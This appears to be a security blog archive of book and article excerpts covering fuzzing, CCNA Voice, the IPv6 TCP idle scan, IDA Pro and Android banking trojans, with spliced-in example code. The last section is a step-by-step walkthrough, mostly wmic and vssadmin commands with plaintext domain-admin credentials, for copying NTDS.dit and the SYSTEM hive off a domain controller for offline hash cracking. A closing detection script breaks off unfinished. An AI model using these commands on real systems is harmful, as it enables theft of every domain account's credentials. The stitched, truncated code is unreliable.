
Fuzzing…Brute Force Vulnerability Discovery……

October 24, 2014


This week I’m writing about Fuzzing … Brute Force Vulnerability Discovery. I just got the book from the National Library (PNM). Fuzzing is a method for discovering faults in software by providing unexpected input and monitoring for exceptions. It is typically an automated or semi-automated process that involves repeatedly manipulating and supplying data to target software for processing. Fuzzing has evolved into one of today’s most effective approaches to testing software security. To “fuzz”, you attach a program’s inputs to a source of random data, and then systematically identify the failures that arise. Hackers have relied on fuzzing for years. Renowned fuzzing experts show you how to use fuzzing to reveal weaknesses in your software before someone else does.

Pregenerated Test Cases – this is the method taken by the PROTOS framework. Test case development begins with studying a particular specification to understand all supported data structures and the acceptable value ranges for each. Hard-coded packets or files are then generated that test boundary conditions or violate the specification altogether. Those test cases can then be used to test how accurately the specification has been implemented on target systems. Creating test cases can require considerable work up front, but has the advantage that they can be reused to uniformly test multiple implementations of the same protocol or file format.

Manual Protocol Mutation Testing – there is no automated fuzzer involved. The researcher is the fuzzer. After loading up the target application, the researcher simply enters inappropriate data in an attempt to crash the server or induce some undesirable behaviour. This class of fuzzing is most often applied to web applications.

Mutation or Brute Force Testing – a fuzzer that starts with a valid sample of a protocol or data format and continually mangles every individual byte, word, dword, or string within that data packet or file. This is a great early approach because it requires very little up-front research, and implementing a basic brute force fuzzer is relatively straightforward.

Network Protocol Fuzzing – I would like to touch on chapter 14, on network protocol fuzzing, which requires identifying the attack surface, mutating or generating error-inducing fuzz values, transmitting those fuzz values to a target, and monitoring that target for faults. If your fuzzer communicates with its target over some form of socket, then it is a network protocol fuzzer.
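The mutation approach above and the mutate/transmit/monitor loop of a network protocol fuzzer, as an added example that is not from the book: a small Python brute force fuzzer that takes a valid sample of a message format, substitutes boundary values for every byte, word and dword, hands each case to an in-process parser standing in for the socket target, and records which cases raise exceptions. The message format, parse_message and SAMPLE are all invented for the illustration.

```python
import struct

# Boundary values that commonly expose off-by-one, sign and overflow bugs.
BYTE_VALUES = (0x00, 0x01, 0x7F, 0x80, 0xFE, 0xFF)
WORD_VALUES = (0x0000, 0x0001, 0x7FFF, 0x8000, 0xFFFE, 0xFFFF)
DWORD_VALUES = (0x00000000, 0x00000001, 0x7FFFFFFF, 0x80000000, 0xFFFFFFFE, 0xFFFFFFFF)


def mutate(sample):
    """Yield (description, test_case): the sample with one byte, word or dword
    at every position replaced by each boundary value in turn (little-endian)."""
    for pos in range(len(sample)):
        for v in BYTE_VALUES:
            yield f"byte@{pos}={v:#04x}", sample[:pos] + bytes([v]) + sample[pos + 1:]
    for pos in range(len(sample) - 1):
        for v in WORD_VALUES:
            yield f"word@{pos}={v:#06x}", sample[:pos] + struct.pack("<H", v) + sample[pos + 2:]
    for pos in range(len(sample) - 3):
        for v in DWORD_VALUES:
            yield f"dword@{pos}={v:#010x}", sample[:pos] + struct.pack("<I", v) + sample[pos + 4:]


# Constructed target standing in for the network service a protocol fuzzer
# would reach over a socket. Message format (invented): 2-byte little-endian
# body length, then a NUL-terminated ASCII name, then a 4-byte count.
def parse_message(data):
    if len(data) < 2:
        raise ValueError("short header")
    (length,) = struct.unpack_from("<H", data, 0)
    body = data[2:2 + length]                 # trusts the declared length without checking len(data)
    name_end = body.index(b"\x00")            # ValueError when no terminator lies inside the body
    name = body[:name_end].decode("ascii")    # UnicodeDecodeError on non-ASCII bytes
    (count,) = struct.unpack_from("<I", body, name_end + 1)  # struct.error when the body is truncated
    return {"name": name, "count": count}


def fuzz(sample, target=parse_message):
    """Deliver every test case to the target and record faults, here any
    uncaught exception; with a real service this is where the socket send
    and the liveness/crash monitor would go."""
    faults = []
    for desc, case in mutate(sample):
        try:
            target(case)
        except Exception as exc:
            faults.append((desc, type(exc).__name__))
    return faults


def summarize(faults):
    """Count faults by exception type, the first cut a triager makes."""
    counts = {}
    for _, kind in faults:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


# Constructed valid sample: body length 10, name "hello", count 7.
SAMPLE = struct.pack("<H", 10) + b"hello\x00" + struct.pack("<I", 7)

if __name__ == "__main__":
    found = fuzz(SAMPLE)
    print(f"{len(found)} faulting cases out of {sum(1 for _ in mutate(SAMPLE))}")
    for desc, kind in found[:5]:
        print(f"  {desc}: {kind}")
    print(summarize(found))
```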

The book contains chapters about Fuzzer Methods and Fuzzer Types, Data Representation and Analysis, Requirements for Effective Fuzzing, Automation and Data Generation, Environment Variable and Argument Fuzzing, and so on, from Chapter 8 to 26. I strongly recommend people in the software engineering and malware expert fields to read this book.

p/s:- Excerpt taken from the book – Fuzzing: Brute Force Vulnerability Discovery – by Addison-Wesley.


CCNA Voice…

October 7, 2014


Just a few weeks ago, I borrowed a book entitled CCNA Voice – Study Guide by Sybex. It’s a pretty good book to read for those who are interested in taking CCNA Voice. It includes about 11 chapters on VoIP voice. In the Cisco Unified Communications architecture, Unified Communications Managers are what make IP telephony possible. These hardware/software devices are the brains that handle IP call processing. The call processing portion of a Unified Communications System handles the sequence of operations from the time a user picks up a phone to make a call to the time the user ends the call by hanging up. All of the signaling, dial interpretation, ringing, and call connecting is performed by the call processor. From a phone user’s standpoint, the call processor acts like a legacy-based analog or digital phone. All of the basic phone functions such as dialing, ring signals, and interactions are the same as they’ve always been. This is obviously by design; because users are so familiar with using phones, it would be very difficult to modify user behavior.

Cisco Unified Communications Manager
When moving from Cisco Unified Communications Manager Business Edition to a full CCM solution, you are primarily gaining two key benefits: redundancy and scalability. The full Cisco Unified Communications Manager network solution can scale to virtually any size and allows you to implement multiple redundant servers that can support IP phones and applications should any of your primary call processing servers fail.

Applications Layer
As you move up to the next layer of the Cisco VoIP structure, you encounter the applications that expand the functionality of the voice network in some way. Many applications have already been developed for the Cisco VoIP solution, each of them adding its own special features to the voice network. Three of these application servers stand out as “essential applications” for many VoIP networks: Cisco Unity (voice mail), Interactive Voice Response (IVR)/Auto Attendant, and Unified Contact Center.

Cisco Unity Products
Cisco has designed the Cisco Unity product line to encompass everything dealing with messaging. Whereas traditional phone systems are geared to deliver messages to telephone handsets, Cisco Unity allows you to deliver messages to a variety of clients. This allows VoIP network users to unify (thus the name) all messaging into a single point of access. For
example, fax messages, voice mail, and e-mail can all be delivered to a single inbox. The Cisco Unity product line comes in three different flavors, as discussed in the following sections:
1. Cisco Unity Express
2. Cisco Unity Connection
3. Cisco Unity

p/s:- Taken from the excerpt – CCNA Voice – Study Guide – from Sybex.


TCP Idle Scans in IPV6…

February 10, 2014


After discovering how to conduct the TCP Idle Scan in IPv6, 21 different operating systems and versions have been analyzed regarding their properties as idle host. Among those, all nine tested Windows systems could be used as idle host. This shows that the mistake of IPv4 to use predictable identification fields is being repeated in IPv6. Compared to IPv4, the idle host in IPv6 is also not expected to remain idle, but only not to send fragmented packets. To defend against this bigger threat, the article also introduces short-term defenses for administrators as well as long-term defenses for vendors.

1. INTRODUCTION
When trying to attack a target, one of the first steps performed by an attacker will be to execute a port scan in order to discover which services are offered by the system and can be attacked. In the traditional approach for port scanning, SYNs are sent directly to various ports on the target to evaluate which services are running.

However, this method is easy to detect and to be traced back to the attacker. To remain undetected, different methods for port scanning exist, all providing various advantages and disadvantages [8]. One of those methods is the TCP Idle Scan. With this port scanning technique, the attacker uses the help of a third-party system, the so-called idle host, to cover his tracks. Most modern operating systems have been improved so that they cannot be used as idle host, but research has shown that the scan can still be executed by utilizing network printers [11]. At first sight, IPv6 seems immune to the idle scan technique, as the IPv6 header no longer contains the identification field. However, some IPv6 traffic still uses an identification field, namely if fragmentation is used. Studying the details of IPv6 reveals that an attacker can force fragmentation between other hosts. The attack on IPv6 is trickier than on IPv4 but has the benefit that more machines will be suited as idle hosts. This is because we only require the idle host not to create fragmented IPv6 traffic, whereas in IPv4 the idle host is not allowed to create traffic at all.

2. Background
The TCP Idle Scan is a stealthy port scanning method, which allows an attacker to scan a target without the need of sending a single IP packet containing his own IP address to the target. Instead, he uses the IP address of a third host, the idle host, for the scan. To be able to retrieve the results from the idle host, the attacker utilizes the identification field in the IPv4 header (IPID), which is originally intended for fragmentation.

3. Conducting the TCP Idle Scan in IPv6
This section deals with the characteristics of the TCP Idle Scan in IPv6. Compared to IPv4, where most modern operating systems use protection mechanisms against the scan, it is novel to conduct the scan in IPv6. Therefore, not all operating systems use the same protection mechanisms as in IPv4. To give an overview of the behavior from various operating systems, tests have been conducted with 21 different systems, and the results are shown and discussed.

4. Behavior of various systems
As stated previously, for executing the TCP Idle Scan in IPv6 it is a necessity that the identification value is assigned by the idle host on a predictable and global basis. To determine which operating systems form appropriate idle hosts, 21 different operating systems and versions have been tested to establish their method of assigning the identification value. Among all the tested systems, six assigned the identification value on a random basis and can therefore not be used as idle host. Out of the remaining 15, five assigned their values on a per-host basis, which also makes those systems unusable. Another system which cannot be used as idle host is OS X 10.6.7, which does not accept PTB messages with an MTU smaller than 1280 bytes. The nine systems which are left, and can be used as idle hosts for the TCP Idle Scan in IPv6, are all Windows operating systems.

System                                Assignment method              Usable
Android 4.1 (Linux 3.0.15)            Per host, incremental (1)      X
FreeBSD 7.4                           Random                         X
FreeBSD 9.1                           Random                         X
iOS 6.1.2                             Random                         X
Linux 2.6.32                          Per host, incremental (2)      X
Linux 3.2                             Per host, incremental (1)      X
Linux 3.8                             Per host, incremental          X
OpenBSD 4.6                           Random                         X
OpenBSD 5.2                           Random                         X
OS X 10.6.7                           Global, incremental (3)        X
OS X 10.8.3                           Random                         X
Solaris 11                            Per host, incremental          X
Windows Server 2003 R2 64bit, SP2     Global, incremental            √
Windows Server 2008 32bit, SP1        Global, incremental            √
Windows Server 2008 R2 64bit, SP1     Global, incremental by 2       √
Windows Server 2012 64bit             Global, incremental by 2 (4)   √
Windows XP Professional 32bit, SP3    Global, incremental (5)        √
Windows Vista Business 64bit, SP1     Global, incremental            √
Windows 7 Home Premium 32bit, SP1     Global, incremental by 2       √
Windows 7 Ultimate 32bit, SP1         Global, incremental by 2       √
Windows 8 Enterprise 32bit            Global, incremental by 2 (4)   √

(1) Host calculates wrong TCP checksum for routes with PMTU < 1280
(2) No packets are sent on routes with PMTU < 1280
(3) Does not accept Packet Too Big messages with MTU < 1280
(4) Per host offset
(5) IPv6 disabled by default
TABLE 1: List of tested systems

A special behavior occurred when testing Windows 8 and Windows Server 2012. A first analysis of the identification values sent to different hosts gives the impression that the values are assigned on a per-host basis and start at a random initialization value. A closer investigation though revealed that the values being assigned for one system are also incremented if messages are sent to another system. This leads to the conclusion that those operating systems use a global counter, but also a random offset for each host, which is added to the counter to create the identification value. However, the global counter is increased each time a message is sent to a host. For the TCP Idle Scan in IPv6, this means that the systems are still suitable as idle hosts, as from the view of the attacker, the identification value received from the idle host increases each time the idle host sends a message to the target. Being still usable as idle host, it is a complete mystery to us what should be achieved with this behavior.
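The assignment methods of Table 1 and the Windows 8 per-host-offset case above, as an added example that is not from the HITB article: a Python classifier that an administrator can run over the fragment identification values one of their own hosts emitted (destination and value, in send order, for instance taken from a packet capture while the host talks to two monitoring machines) to see whether the host assigns them on a global, global-with-offset, per-host or random basis. The SAMPLES sequences are constructed; no packets are sent.

```python
MOD = 1 << 32      # width of the identification field in the IPv6 fragment header
STEPS = (1, 2)     # increments seen in Table 1 ("incremental", "incremental by 2")


def _deltas(values):
    """Differences between consecutive values, modulo the 32-bit field width."""
    return [(b - a) % MOD for a, b in zip(values, values[1:])]


def _constant_per_host(observations, key):
    """True if key(sequence_index, ident) yields a single value per destination."""
    seen = {}
    for i, (host, ident) in enumerate(observations):
        value = key(i, ident)
        if seen.setdefault(host, value) != value:
            return False
    return True


def classify(observations):
    """observations: [(destination, ident), ...] in the order the probed host sent them.
    Returns (method, step) with method one of 'global', 'global-offset', 'per-host',
    'random'. Sends must be irregularly interleaved between at least two destinations:
    with strictly alternating sends a per-host counter of step 2 looks exactly like a
    global counter of step 1 plus per-host offsets."""
    if len({h for h, _ in observations}) < 2 or len(observations) < 4:
        raise ValueError("need interleaved sends to at least two destinations")
    idents = [ident for _, ident in observations]
    # 1. Plain global counter: every packet, whatever its destination, adds one step.
    for step in STEPS:
        if all(d == step for d in _deltas(idents)):
            return "global", step
    # 2. Global counter plus a per-destination random offset (Table 1, note 4):
    #    ident - step * sequence_index is constant for each destination.
    for step in STEPS:
        if _constant_per_host(observations, lambda i, v, s=step: (v - s * i) % MOD):
            return "global-offset", step
    # 3. Per-destination counter: constant step within one destination's packets,
    #    unaffected by packets sent to other destinations in between.
    by_host = {}
    for host, ident in observations:
        by_host.setdefault(host, []).append(ident)
    for step in STEPS:
        if all(all(d == step for d in _deltas(v)) for v in by_host.values()):
            return "per-host", step
    return "random", None


def usable_as_idle_host(observations):
    """The scan needs a value that advances predictably with every packet the host
    sends; the per-host offset of note (4) does not hide those increments."""
    return classify(observations)[0] in ("global", "global-offset")


# Constructed observation sequences (destination, identification), in send order.
SAMPLES = {
    "win2008r2-like": [("A", 1000), ("B", 1002), ("B", 1004), ("A", 1006)],
    "win8-like": [("A", 500000), ("B", 92), ("B", 94), ("A", 500006), ("A", 500008), ("B", 100)],
    "linux-like": [("A", 10), ("A", 11), ("B", 7000), ("A", 12), ("B", 7001), ("B", 7002)],
    "openbsd-like": [("A", 3920117443), ("B", 178223), ("A", 2891022), ("B", 4010), ("B", 77), ("A", 5)],
    "wraparound": [("A", 4294967295), ("B", 0), ("B", 1), ("A", 2)],
}

if __name__ == "__main__":
    for name, obs in SAMPLES.items():
        method, step = classify(obs)
        print(f"{name:16} {method:14} step={step}  usable={usable_as_idle_host(obs)}")
```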

6. Conclusion
This paper has shown that by clever use of some IPv6 features, the TCP Idle Scan can successfully be transferred from IPv4 to IPv6. Therefore, this type of port scan remains a powerful tool in the hands of an attacker who wants to cover his tracks, and a challenge for anybody who tries to trace back the scan to its origin. The fact that major operating systems assign the identification value in the fragmentation header in a predictable way also drastically increases the chances for an attacker to find a suitable idle host for executing the TCP Idle Scan in IPv6. Because the idle host is also not required to be completely idle, but only expected not to create IPv6 traffic using the fragmentation header, these chances are increased additionally. What remains is the question why it is still a common practice to utilize predictable identification values. The danger of predictable sequence numbers has already been disclosed by Morris [13] in 1985. Although his article covered TCP, the vulnerabilities were caused by the same problem: a predictable assignment of the sequence number. For this reason, he advised to use random sequence numbers. With the TCP Idle Scan in IPv4 being first discovered in 1998, it has been shown that the necessity of unpredictable identification values also applies to IPv4. This article has shown that also in IPv6, predictable identification values facilitate attacks and should be substituted with random values. To prove that the TCP Idle Scan in IPv6 works in practice, a proof of concept has been created using the python program scapy, which allows easy creation and manipulation of packets. The proof of concept can be found in the appendix. Furthermore, the security scanner Nmap, which already provided a very elaborate version of the TCP Idle Scan in IPv4, has been extended in order to also handle the TCP Idle Scan in IPv6 [10]. Until vendors are able to provide patches for assigning unpredictable identification values in the fragmentation header, administrators are advised to implement the short-term protection mechanisms described in Section 5. Additionally, one might consider an update of RFC 1981, which forces a host to append an empty fragmentation header to every IPv6 packet after receiving an ICMPv6 Packet Too Big message with an MTU smaller than the IPv6 minimum MTU. Likewise, updating RFC 2460 towards an obligatory random assignment of the identification value in the fragmentation header should be considered as well.

p/s:- This article is taken from the excerpt of Hack In The Box  Magazine , January 2014 – Vol 4 issue 10.

- Last year’s PIKOM PC Fair was the best PC Fair that I’ve ever attended, in December 2013… Great exhibition from all the computer manufacturers… The one from MSI was the best. Not to mention the Kaspersky booth… Bought an 8GB pendrive…

- Well… this is my latest post for this year, 2014… Hope to see you soon…


Practical Malware Analysis using IDA Pro….

September 15, 2013


Two versions of IDA Pro are commercially available. While both versions support x86, the advanced version supports many more processors than the standard version, most notably x64. IDA Pro also supports several file formats, such as Portable Executable (PE), Common Object File Format (COFF), Executable and Linking Format (ELF), and a.out. We’ll focus our discussion on the x86 and x64 architectures and the PE file format.

The IDA Pro Interface
After you load a program into IDA Pro, you will see the disassembly window, as shown in Figure 5-2. This will be your primary space for manipulating and analyzing binaries, and it’s where the assembly code resides.

Disassembly Window Modes
You can display the disassembly window in one of two modes: graph (the default, shown in Figure 5-2) and text. To switch between modes, press the spacebar.

Graph Mode
In graph mode, IDA Pro excludes certain information that we recommend you display, such as line numbers and operation codes. To change these options, select Options > General, and then select Line prefixes and set the Number of Opcode Bytes to 6. Because most instructions contain 6 or fewer bytes, this setting will allow you to see the memory locations and opcode values for each instruction in the code listing. (If these settings make everything scroll off the screen to the right, try setting the Instruction Indentation to 8.)

Text Mode
The text mode of the disassembly window is a more traditional view, and you must use it to view data regions of a binary. Figure 5-3 displays the text mode view of a disassembled function. It displays the memory address (0040105B) and section name (.text) in which the opcodes (83EC18) will reside in memory.

The left portion of the text-mode display is known as the arrows window and shows the program’s nonlinear flow. Solid lines mark unconditional jumps, and dashed lines mark conditional jumps. Arrows facing up indicate a loop. The example includes the stack layout for the function at and a comment (beginning with a semicolon) that was automatically added by IDA Pro.

Using Cross-References
A cross-reference, known as an xref in IDA Pro, can tell you where a function is called or where a string is used. If you identify a useful function and want to know the parameters with which it is called, you can use a cross-reference to navigate quickly to the location where the parameters are placed on the stack. Interesting graphs can also be generated based on cross-references, which are helpful to performing analysis.

Code Cross-References
Listing 5-2 shows a code cross-reference at that tells us that this function (sub_401000) is called from inside the main function at offset 0x3 into the main function. The code cross-reference for the jump at tells us which jump takes us to this location, which in this example corresponds to the location marked at . We know this because at offset 0x19 into sub_401000 is the jmp at memory address 0x401019.

00401000 sub_401000 proc near ; CODE XREF: _main+3p
00401000 push ebp
00401001 mov ebp, esp
00401003 loc_401003: ; CODE XREF: sub_401000+19j
00401003 mov eax, 1
00401008 test eax, eax
0040100A jz short loc_40101B
0040100C push offset aLoop ; "Loop\n"
00401011 call printf
00401016 add esp, 4
00401019 jmp short loc_401003
Listing 5-2: Code cross-references
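To make the xref notation in Listing 5-2 concrete, here is an added Python example (not from the book and not IDA Pro’s own logic) that parses a listing in this text-mode layout and derives the CODE XREF comments from the jump and call instructions: the target of each branch is looked up by label, and the source is expressed as the enclosing function plus a hex offset, suffixed j for a jump or p for a call. The loc_40101B label and the _main function in LISTING are constructed so that both xrefs shown in the book’s listing can be resolved.

```python
import re

# 'address  body ; optional comment', one instruction, label or proc per line
LINE_RE = re.compile(r"^([0-9A-Fa-f]{8})\s+(.*?)\s*(?:;.*)?$")
BRANCHES = {"jmp", "jz", "jnz", "je", "jne", "ja", "jae", "jb", "jbe", "jg", "jge", "jl", "jle"}


def parse_listing(text):
    """Split a listing into functions {name: addr}, labels {name: addr} and
    instructions [(addr, mnemonic, operands)]; 'endp' lines are skipped."""
    functions, labels, instructions = {}, {}, []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        addr, parts = int(m.group(1), 16), m.group(2).split()
        if len(parts) >= 2 and parts[1] in ("proc", "endp"):
            if parts[1] == "proc":
                functions[parts[0]] = addr
        elif parts and parts[0].endswith(":"):
            labels[parts[0][:-1]] = addr
        elif parts:
            instructions.append((addr, parts[0].lower(), parts[1:]))
    return functions, labels, instructions


def enclosing_function(functions, addr):
    """(name, offset) of the function whose start is the highest one <= addr."""
    candidates = [(a, n) for n, a in functions.items() if a <= addr]
    if not candidates:
        return None
    start, name = max(candidates)
    return name, addr - start


def code_xrefs(text):
    """Map target address -> xref strings in IDA's style: '<func>+<hex offset>'
    followed by 'j' for a jump or 'p' for a call (p as in procedure)."""
    functions, labels, instructions = parse_listing(text)
    symbols = {**labels, **functions}
    xrefs = {}
    for addr, mnem, ops in instructions:
        if not ops or not (mnem == "call" or mnem in BRANCHES):
            continue
        target = symbols.get(ops[-1])          # 'short loc_401003' -> 'loc_401003'
        where = enclosing_function(functions, addr)
        if target is None or where is None:
            continue                           # external target (printf) or unresolvable
        name, off = where
        xrefs.setdefault(target, []).append(f"{name}+{off:X}{'p' if mnem == 'call' else 'j'}")
    return xrefs


def annotate(text):
    """Re-emit the listing with derived CODE XREF comments on proc and label lines
    (existing comments are dropped)."""
    xrefs, out = code_xrefs(text), []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        line = raw.split(";")[0].rstrip()
        if m and int(m.group(1), 16) in xrefs and (" proc " in line or line.endswith(":")):
            line += " ; CODE XREF: " + ", ".join(xrefs[int(m.group(1), 16)])
        out.append(line)
    return "\n".join(out)


# Listing 5-2 plus a constructed loc_40101B label and a constructed _main caller.
LISTING = """\
00401000 sub_401000 proc near ; CODE XREF: _main+3p
00401000 push ebp
00401001 mov ebp, esp
00401003 loc_401003: ; CODE XREF: sub_401000+19j
00401003 mov eax, 1
00401008 test eax, eax
0040100A jz short loc_40101B
0040100C push offset aLoop ; "Loop\\n"
00401011 call printf
00401016 add esp, 4
00401019 jmp short loc_401003
0040101B loc_40101B:
0040101B pop ebp
0040101C retn
0040101C sub_401000 endp
00401030 _main proc near
00401030 push ebp
00401031 mov ebp, esp
00401033 call sub_401000
00401038 pop ebp
00401039 retn
00401039 _main endp
"""

if __name__ == "__main__":
    print(annotate(LISTING))
```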

This chapter offered only a cursory exposure to IDA Pro. Throughout this article, we will use IDA Pro in our labs as we demonstrate interesting ways to use it. As you’ve seen, IDA Pro’s ability to view disassembly is only one small aspect of its power. IDA Pro’s true power comes from its interactive ability, and we’ve discussed ways to use it to mark up disassembly to help perform analysis. We’ve also discussed ways to use IDA Pro to browse the assembly code, including navigational browsing, utilizing the power of cross-references, and viewing graphs, which all speed up the analysis process.

IDA Pro is a good tool for disassembling a program and doing reverse engineering. IDA Pro is widely used for malware analysis. We can use IDA Pro to see the overall disassembly process and the program code in graph view and text view. We need to have some assembly language knowledge to disassemble a program.

p/s:- The above article is taken from an excerpt of “Practical Malware Analysis” by Michael Sikorski.


Mobile Malware Evolution….

June 18, 2013


Kaspersky Lab’s prediction that we would see the first mobile botnets for Android was also accurate. Note, however, that the botnets that emerged varied greatly in terms of where in the world devices were infected, as well as the number of infected devices, and the functions of the malware.

The predictions addressed above only affected the most commonly used platform today – Android. As far as other mobile platforms and operating systems are concerned, we expected targeted attacks to be among the key threats targeting Symbian, BlackBerry, and other mobile platforms. Typical attacks of this kind usually involve ZitMo and SpitMo (ZeuS- and SpyEye-in-the-Mobile). This prediction also proved correct. Furthermore, the family of threats designed to steal mTANs (ZitMo and SpitMo) gained a new addition – the prevalent bank Trojan Carberp now has a mobile version with the alias CitMo, or Carberp-in-the-Mobile.

Two other general, but critically important, predictions that will play a key role in determining the future of attacks on mobile platforms also came true. First, we saw the development of a fully-fledged mobile malware development industry. Second, mobile espionage went beyond the realm of law enforcement agencies and firms specializing in detective work.

The main developments in mobile malware in 2012 are the subject of this sixth edition of Kaspersky Lab’s Mobile Malware Evolution report.

Several new ZitMo modifications for Android have started to look more like their “brothers” targeting other platforms. Previously ZitMo for Android had only relatively primitive functions (primarily the ability to forward incoming text messages containing mTANs). However, the latest versions of this Trojan have included an expanded list of commands that are used by the writers of the malicious program to control and manage the threat’s operations.


An example of some of the commands in ZitMo for Android

Before 2012, attacks launched to steal mTANs had been detected in just a handful of European countries: Spain, Italy, Germany, Poland, and a few others. These attacks involved users of a variety of mobile platforms: Android, BlackBerry, Symbian, and Windows Mobile. In late 2012, Russia became one of the targets, as online banking became more commonplace — a factor that did not go unnoticed by virus writers. The widespread Trojan Carberp, which operates in a similar way to that of ZeuS, got its own mobile version: Trojan-Spy.AndroidOS.Citmo.

Just like its partner in crime ZeuS ZitMo, the CitMo Trojan is capable of concealing incoming text messages containing mTANs and forwarding them to malicious users. Different versions of CitMo forward intercepted text messages both to the telephone numbers of cybercriminals and to their remote servers.

One version of Carberp changed the landing page of a Russian bank’s online banking system. Users were asked to download and install a program allegedly required to enter the system. Users could opt to receive a link to the program by text message, either by providing their phone number in advance, or by scanning a QR code.


QR codes are one way to download malware

The link in this example led to the AberSafe application, which was actually Trojan-Spy.AndroidOS.Citmo, and was in the Google Play app store within two weeks.

p/s:- This article is taken from an excerpt from the Kaspersky web site http://www.securelist.com. We can see that there is a progress of malware infection from year 2012 till now, 2013. Mostly, the operating system that hits the highest rank from 2012 till 2013 is the Android operating system.


Volume shadow copy ntds.dit domain hashes remotely – part 1.

June 18, 2013


Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV and GPOs not allowing anyone to RDP in (even Domain Admins) unless they provided some kind of voodoo happy dance? Ya, me neither, but here is how you can still dump domain hashes and hash history if you run into that case. Let’s start.

First authenticate to the domain controller and make sure you have a good working directory to use.

net use \\DC1 /user:DOMAIN\domainadminsvc domainadminsvc123
dir \\DC1\C$

Alright, let’s say “TEMP” is there and it’s empty on the remote DC. The way we are going to run commands will not allow us to get results directly, so we are going to use a temp file on the DC in C:\TEMP, which we already made sure is clear.

We are going to be using Volume Shadow Copies to pull the NTDS.dit file (Active Directory’s DB, much like Windows’ SAM file except that it stores the entire AD set of objects there); we also need the SYSTEM registry hive. You can get the SAM registry hive as well, but that will only get local DC credentials.

So let’s list the current volume shadow copies to see if we need to create one, from a Windows command prompt (or if you’ve installed wmic for Linux via http://www.krenger.ch/blog/wmi-commands-from-linux/ ) – this _IS_ an interactive command so this won’t work very nicely in a Meterpreter shell:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > C:\temp\output.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 7304;
        ReturnValue = 0;
};

To break down this command:

  • wmic /node:DC1 – tells it to interact with the WMI API on DC1
  • /user:DOMAIN\domainadminsvc /password:domainadminsvc123 – authentication
  • process call create – WMI speak for create a process
  • cmd /c – vssadmin doesn’t operate outside of cmd for some reason…
  • vssadmin list shadows – List any shadow volumes that already exist
  • 2>&1 > C:\temp\output.txt – Take STDIN and STDERROR and throw it in a text file on DC1 C:\TEMP. Make sure you specify the full path because you will be executing from within C:\Windows\System32 and it’s a pain to find anything in that directory. So if you just specify > bob.txt you get to hunt in C:\Windows\System32 or wherever WMI wants to execute you from for bob.txt

The process starts and then you need to view the output file by either copying it down, running type \\DC1\C$\TEMP\output.txt, or mounting the C drive as a network share. Either way, you should see something like this:

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {671090fd-0198}
   Contained 1 shadow copies at creation time: 5/31/2013 11:29:03 AM
      Shadow Copy ID: {0863e309}
         Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: wpad
         Service Machine: wpad
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

or

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

No items found that satisfy the query

If there are no shadow copies or the ones there are too old (look at the creation time), you can create a shadow copy using the ‘vssadmin create shadow /for=C:’ command. (This command only applies to Server OS (Win2k3/Win2k8), but since those are the only two that commonly have NTDS.dit files we don’t have to remember this):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"

The other thing to keep in mind is that NTDS.dit isn’t always on the main drive. It is commonly on a “D” drive for safety if a HDD goes bad or something. But it should always be in a folder called NTDS. (By default this is C:\Windows\NTDS)

Next we just copy the files out of the shadow copies. First the SYSTEM hive:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1 > C:\temp\output.txt"

Then the NTDS.dit (notice this one isn’t in System32):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt"

In Kali Linux you could use the WMIS package to do much the same thing:

root@kali:~# wmis -U DOMAIN\domainadminsvc%domainadminsvc123 //DC1 cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt
NTSTATUS: NT_STATUS_OK - Success

p/s:- This article is taken from an excerpt from Mubix’s blog http://www.room362.com
      In part 2, you have to download ntdsxtract, which is a zip file, and use it to extract libesedb and NTDS.dit. Then we can start cracking and see the user accounts that it uses. Hope you all enjoy....
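From the defender’s side, as an added example that is not part of Mubix’s post: every step above leaves a distinctive trail in process-creation logging, namely cmd.exe started under WmiPrvSE.exe (the host process for Win32_Process.Create) running vssadmin, or a copy whose source is a \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path and whose target is NTDS.dit or the SYSTEM/SAM hive. This Python script applies those checks to constructed sample records; the field names host, image, parent_image and command_line are an assumed normalized schema, as one would map from Windows event 4688 with command-line auditing enabled or Sysmon event 1.

```python
import re

# Indicators drawn from the commands in the post above (constructed detection logic).
SHADOW_PATH = re.compile(r"\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+", re.I)
SENSITIVE_FILE = re.compile(r"\\(NTDS\\ntds\.dit|System32\\config\\(SYSTEM|SAM))\b", re.I)
VSSADMIN_CMD = re.compile(r"\bvssadmin(\.exe)?\s+(create|list)\s+shadows?\b", re.I)
WMI_HOST_PROCESS = "wmiprvse.exe"   # parent of anything started via Win32_Process.Create

SEVERITY = {"high": 0, "medium": 1, "low": 2, "info": 3}


def classify_event(event):
    """Findings [(severity, reason)] for one process-creation record with the
    assumed keys host, image, parent_image and command_line."""
    findings = []
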